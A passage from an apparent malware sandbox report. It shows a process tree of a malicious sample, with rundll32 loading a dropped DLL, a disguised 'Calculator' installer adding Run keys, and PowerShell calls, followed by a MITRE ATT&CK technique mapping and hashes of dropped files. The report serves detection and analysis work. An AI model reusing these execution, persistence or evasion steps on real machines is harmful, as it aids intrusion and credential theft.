                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                          PID:4900
                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 6304 -ip 6304
                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                          PID:5872
                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 6748 -ip 6748
                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                          PID:7340
                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 6676 -ip 6676
                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                          PID:2668
                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4048 -ip 4048
                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                          PID:7436
                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                          PID:5320
                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                                                            PID:7400
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 7400 -s 448
                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                                                                                                                              • Checks processor information in registry
                                                                                                                                                                                                                                                                                                              • Enumerates system info in registry
                                                                                                                                                                                                                                                                                                              PID:1496
                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 7400 -ip 7400
                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                          PID:8088
                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\WaaSMedicAgent.exe
                                                                                                                                                                                                                                                                                                          C:\Windows\System32\WaaSMedicAgent.exe 2306010a9752f376cff4bbee56aa08eb c4QZvIvDlEangE8xJGiw+w.0.1.0.3.0
                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                          PID:4164
                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 17256 -ip 17256
                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                          PID:2088
                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                                                                                                          C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                          • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                          • Enumerates connected drives
                                                                                                                                                                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                          PID:6500
                                                                                                                                                                                                                                                                                                          • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                            C:\Windows\syswow64\MsiExec.exe -Embedding 2BD5B51E5FB79DAB96DE58E5197C803E C
                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                                                            PID:3532
                                                                                                                                                                                                                                                                                                          • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                            C:\Windows\syswow64\MsiExec.exe -Embedding 3EAE137EAA3C8E5C691D5390F70C9A3B C
                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                                                            PID:1952
                                                                                                                                                                                                                                                                                                          • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                            C:\Windows\syswow64\MsiExec.exe -Embedding 8DF38514A89FAFA7EE1824524B7E6B94
                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                            • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                                                            PID:9404
                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Calculator\Calculator\prerequisites\aipackagechainer.exe
                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Calculator\Calculator\prerequisites\aipackagechainer.exe"
                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                            • Adds Run key to start application
                                                                                                                                                                                                                                                                                                            PID:12072
                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Calculator\Calculator\prerequisites\RequiredApplication_1\Calculator%20Installation.exe
                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Calculator\Calculator\prerequisites\RequiredApplication_1\Calculator%20Installation.exe" -silent=1 -CID=764 -SID=764 -submn=default
                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                              • Adds Run key to start application
                                                                                                                                                                                                                                                                                                              PID:12348
                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--oYd2f1"
                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                  PID:6120
                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x208,0x20c,0x210,0x1e4,0x214,0x7ff8e63fdec0,0x7ff8e63fded0,0x7ff8e63fdee0
                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                      PID:3280
                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x13c,0x140,0x144,0x118,0x148,0x7ff61bfc9e70,0x7ff61bfc9e80,0x7ff61bfc9e90
                                                                                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                                                                                          PID:1152
                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1596,10820490374432650511,900785028587396085,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6120_1075468220" --mojo-platform-channel-handle=1724 /prefetch:8
                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                          PID:5440
                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1596,10820490374432650511,900785028587396085,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6120_1075468220" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1624 /prefetch:2
                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                            PID:2852
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_7F44.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Calculator\Calculator\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Calculator\Calculator\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Calculator\Calculator\prerequisites' -retry_count 10"
                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                        • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                                                        PID:3508
                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                    PID:7520
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                      PID:2460
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2460 -s 448
                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                        • Enumerates system info in registry
                                                                                                                                                                                                                                                                                                                        PID:6736
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2460 -ip 2460
                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                    PID:7468
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 5468 -ip 5468
                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                    PID:6212
                                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                                                                                                                                                                                    C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                      PID:9124
                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                        PID:10356
                                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                        C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                          PID:11812
                                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                          C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc
                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                            PID:3332
                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                            PID:10080
                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                              PID:10120
                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                PID:10072
                                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                                C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                  PID:17220
                                                                                                                                                                                                                                                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                                  C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                    PID:24276
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                                    C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                      PID:32372

                                                                                                                                                                                                                                                                                                                                    Network

                                                                                                                                                                                                                                                                                                                                    MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                                                                                    Execution

                                                                                                                                                                                                                                                                                                                                    Scheduled Task

                                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                                    T1053

                                                                                                                                                                                                                                                                                                                                    Persistence

                                                                                                                                                                                                                                                                                                                                    Modify Existing Service

                                                                                                                                                                                                                                                                                                                                    2
                                                                                                                                                                                                                                                                                                                                    T1031

                                                                                                                                                                                                                                                                                                                                    Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                                                    2
                                                                                                                                                                                                                                                                                                                                    T1060

                                                                                                                                                                                                                                                                                                                                    Scheduled Task

                                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                                    T1053

                                                                                                                                                                                                                                                                                                                                    BITS Jobs

                                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                                    T1197

                                                                                                                                                                                                                                                                                                                                    Privilege Escalation

                                                                                                                                                                                                                                                                                                                                    Bypass User Account Control

                                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                                    T1088

                                                                                                                                                                                                                                                                                                                                    Scheduled Task

                                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                                    T1053

                                                                                                                                                                                                                                                                                                                                    Defense Evasion

                                                                                                                                                                                                                                                                                                                                    Modify Registry

                                                                                                                                                                                                                                                                                                                                    9
                                                                                                                                                                                                                                                                                                                                    T1112

                                                                                                                                                                                                                                                                                                                                    Disabling Security Tools

                                                                                                                                                                                                                                                                                                                                    5
                                                                                                                                                                                                                                                                                                                                    T1089

                                                                                                                                                                                                                                                                                                                                    Bypass User Account Control

                                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                                    T1088

                                                                                                                                                                                                                                                                                                                                    Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                                    T1497

                                                                                                                                                                                                                                                                                                                                    Impair Defenses

                                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                                    T1562

                                                                                                                                                                                                                                                                                                                                    BITS Jobs

                                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                                    T1197

                                                                                                                                                                                                                                                                                                                                    Install Root Certificate

                                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                                    T1130

                                                                                                                                                                                                                                                                                                                                    Credential Access

                                                                                                                                                                                                                                                                                                                                    Credentials in Files

                                                                                                                                                                                                                                                                                                                                    3
                                                                                                                                                                                                                                                                                                                                    T1081

                                                                                                                                                                                                                                                                                                                                    Discovery

                                                                                                                                                                                                                                                                                                                                    Software Discovery

                                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                                    T1518

                                                                                                                                                                                                                                                                                                                                    Query Registry

                                                                                                                                                                                                                                                                                                                                    7
                                                                                                                                                                                                                                                                                                                                    T1012

                                                                                                                                                                                                                                                                                                                                    Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                                    T1497

                                                                                                                                                                                                                                                                                                                                    System Information Discovery

                                                                                                                                                                                                                                                                                                                                    7
                                                                                                                                                                                                                                                                                                                                    T1082

                                                                                                                                                                                                                                                                                                                                    Security Software Discovery

                                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                                    T1063

                                                                                                                                                                                                                                                                                                                                    Peripheral Device Discovery

                                                                                                                                                                                                                                                                                                                                    2
                                                                                                                                                                                                                                                                                                                                    T1120

                                                                                                                                                                                                                                                                                                                                    Collection

                                                                                                                                                                                                                                                                                                                                    Data from Local System

                                                                                                                                                                                                                                                                                                                                    3
                                                                                                                                                                                                                                                                                                                                    T1005

                                                                                                                                                                                                                                                                                                                                    Email Collection

                                                                                                                                                                                                                                                                                                                                    2
                                                                                                                                                                                                                                                                                                                                    T1114

                                                                                                                                                                                                                                                                                                                                    Command and Control

                                                                                                                                                                                                                                                                                                                                    Web Service

                                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                                    T1102

                                                                                                                                                                                                                                                                                                                                    Impact

                                                                                                                                                                                                                                                                                                                                    Service Stop

                                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                                    T1489

                                                                                                                                                                                                                                                                                                                                    Replay Monitor

                                                                                                                                                                                                                                                                                                                                    Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                                    Downloads

                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\09xU.exE
                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      7c6b2dc2c253c2a6a3708605737aa9ae

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      cf4284f29f740b4925fb2902f7c3f234a5744718

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      b45c9de845522095bbfa55166b519b2be36a08cea688491b9f339e862e79c3ba

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      19579900d07912096641cc7381131ff6fcf60fffc99cdab23f7d8a577aa926bbf0e885a3a7869298bbfc0a05e276c1d5f45712812e4df6980e9554fc48162b07

                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\09xU.exE
                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      7c6b2dc2c253c2a6a3708605737aa9ae

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      cf4284f29f740b4925fb2902f7c3f234a5744718

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      b45c9de845522095bbfa55166b519b2be36a08cea688491b9f339e862e79c3ba

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      19579900d07912096641cc7381131ff6fcf60fffc99cdab23f7d8a577aa926bbf0e885a3a7869298bbfc0a05e276c1d5f45712812e4df6980e9554fc48162b07

                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\4.exe
                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      9d8943b42e7f926a62fc7b9acf703027

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      816cb627d8e6dca46f23555bbf2189987ee8f9fb

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      6693fc6ff371413243f434b49ac4ab29fbb0955937a6a023d3dbe143879a2f0d

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      4cb6df21a256e8d66553a110828ce0624f776cc3bd608e07d31db4ee4ea9caeaec0991c2e3080908c835cd96eac905575696f5da8da181af623c0f7db0dc6e3d

                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\4.exe
                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      9d8943b42e7f926a62fc7b9acf703027

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      816cb627d8e6dca46f23555bbf2189987ee8f9fb

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      6693fc6ff371413243f434b49ac4ab29fbb0955937a6a023d3dbe143879a2f0d

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      4cb6df21a256e8d66553a110828ce0624f776cc3bd608e07d31db4ee4ea9caeaec0991c2e3080908c835cd96eac905575696f5da8da181af623c0f7db0dc6e3d

                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS454469E3\Mon203f01ac7e6.exe
                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      7c6b2dc2c253c2a6a3708605737aa9ae

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      cf4284f29f740b4925fb2902f7c3f234a5744718

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      b45c9de845522095bbfa55166b519b2be36a08cea688491b9f339e862e79c3ba

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      19579900d07912096641cc7381131ff6fcf60fffc99cdab23f7d8a577aa926bbf0e885a3a7869298bbfc0a05e276c1d5f45712812e4df6980e9554fc48162b07

                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS454469E3\Mon203f01ac7e6.exe
                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      7c6b2dc2c253c2a6a3708605737aa9ae

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      cf4284f29f740b4925fb2902f7c3f234a5744718

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      b45c9de845522095bbfa55166b519b2be36a08cea688491b9f339e862e79c3ba

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      19579900d07912096641cc7381131ff6fcf60fffc99cdab23f7d8a577aa926bbf0e885a3a7869298bbfc0a05e276c1d5f45712812e4df6980e9554fc48162b07

                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS454469E3\Mon204014f13870f5e.exe
                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      5274c2ef1482b089970b8b606f7988b1

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      9445cb81692efb96cdf774512c2aa388ae103f26

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      235a9ab0c25a3ffb134ac3a1eca188b30adcc37fe8e2724527ea8087b65ba5a3

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      d72b0519d27225f0cd1e4efbf910cc1e82b7541b1954bf4e05d2eb1935f19025ff7689d5ed47e786241fd015a2a885fcd07a85e04b43505081e87b2b76a52835

                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS454469E3\Mon204014f13870f5e.exe
                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      5274c2ef1482b089970b8b606f7988b1

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      9445cb81692efb96cdf774512c2aa388ae103f26

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      235a9ab0c25a3ffb134ac3a1eca188b30adcc37fe8e2724527ea8087b65ba5a3

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      d72b0519d27225f0cd1e4efbf910cc1e82b7541b1954bf4e05d2eb1935f19025ff7689d5ed47e786241fd015a2a885fcd07a85e04b43505081e87b2b76a52835

                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS454469E3\Mon206b909958ed4.exe
                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      e7326b681ce6557f0cdd5a82797c07d5

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      49883439bc8a8f77f1dddda57328e44f9b7a5cf3

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      6bbe1cc1031645239272fba24242ed0da5f3214420d2fde359abec3c9bc52636

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      9ce778312111d678bd09ea8a5174c632184c4ae52e5757f856478dcea5249212892888957a716ef7de17449d04772dc4fa06bf048134c38948bc4d66c82de9c8

                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS454469E3\Mon206b909958ed4.exe
                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      e7326b681ce6557f0cdd5a82797c07d5

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      49883439bc8a8f77f1dddda57328e44f9b7a5cf3

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      6bbe1cc1031645239272fba24242ed0da5f3214420d2fde359abec3c9bc52636

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      9ce778312111d678bd09ea8a5174c632184c4ae52e5757f856478dcea5249212892888957a716ef7de17449d04772dc4fa06bf048134c38948bc4d66c82de9c8

                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS454469E3\Mon206d48916f93c5.exe
                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      d082843d4e999ea9bbf4d89ee0dc1886

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      4e2117961f8dac71dde658a457fb6a56d5a6f1aa

                                                                                                                                                                                                                                                                                                                                      SHA256

